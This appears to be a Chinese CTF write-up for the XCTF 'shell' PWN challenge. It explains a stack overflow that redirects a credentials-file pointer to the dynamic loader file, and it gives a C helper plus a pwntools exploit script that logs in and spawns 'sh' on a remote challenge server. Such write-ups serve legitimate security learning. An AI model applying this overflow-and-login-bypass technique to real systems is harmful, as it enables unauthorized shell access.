攻防世界PWN之shell题解

161 篇文章 24 订阅
161 篇文章 9 订阅

shell

首先,检查一下程序的保护机制

然后,我们用IDA分析

存在栈溢出漏洞

我们先运行程序,发现可以直接输命令

然而,其他命令都不可用,需要登录成功才能用

我们看看登录的逻辑

程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码

只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shell

Main函数里最外层是死循环,因此我们不能结束它,也就不能ROP

我们可以把filename指针覆盖成其他地方啊,查看一下文件中的字符串

这个可以用,我们就把filename指针指向这个字符串吧,这样,程序第二次循环就从/lib64/ld-linux-x86-64.so.2文件中读取,由于我们本地也用这个文件,我们可以找找里面的字符串有没有符合条件的

  1. #include <stdio.h>  
  2.   
  3. int main() {  
  4.     FILE *f = fopen("/lib64/ld-linux-x86-64.so.2","r");  
  5.     char *buf = NULL;  
  6.     size_t n;  
  7.     if (f == NULL) {  
  8.         printf("error\n");  
  9.     }  
  10.     while (getline(&buf,&n,f) != -1) {  
  11.         char* user = strtok(buf, ":");  
  12.         char* pwd = strtok(0LL, ":");  
  13.         printf("%s:%s\n",user,pwd);  
  14.     }  
  15.     fclose(f);  
  16.     return 0;  
  17. }  

我们发现,这些都可以使用

那么我们就随便选一组即可

综上,我们的exp脚本

  1. #coding:utf8  
  2. from pwn import *  
  3.   
  4. sh = remote('111.198.29.45',58711)  
  5.   
  6. #sh = process('./shell')  
  7. sh.sendline('login')  
  8. sh.sendlineafter('Username: ','sea')  
  9. #溢出栈覆盖filename,使得程序读取/lib64/ld-linux-x86-64.so.2文件中的内容  
  10. payload = 'a'*0x44 + p64(0x400200)  
  11. sh.sendlineafter('Password: ',payload)  
  12.   
  13. sh.sendlineafter('Authentication failed!','login')  
  14. sh.sendlineafter('Username: ','relocation processing')  
  15. sh.sendlineafter('Password: ',' %s%s')  
  16.   
  17. sh.sendlineafter('Authenticated!','sh')  
  18.   
  19.   
  20. sh.interactive()  
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值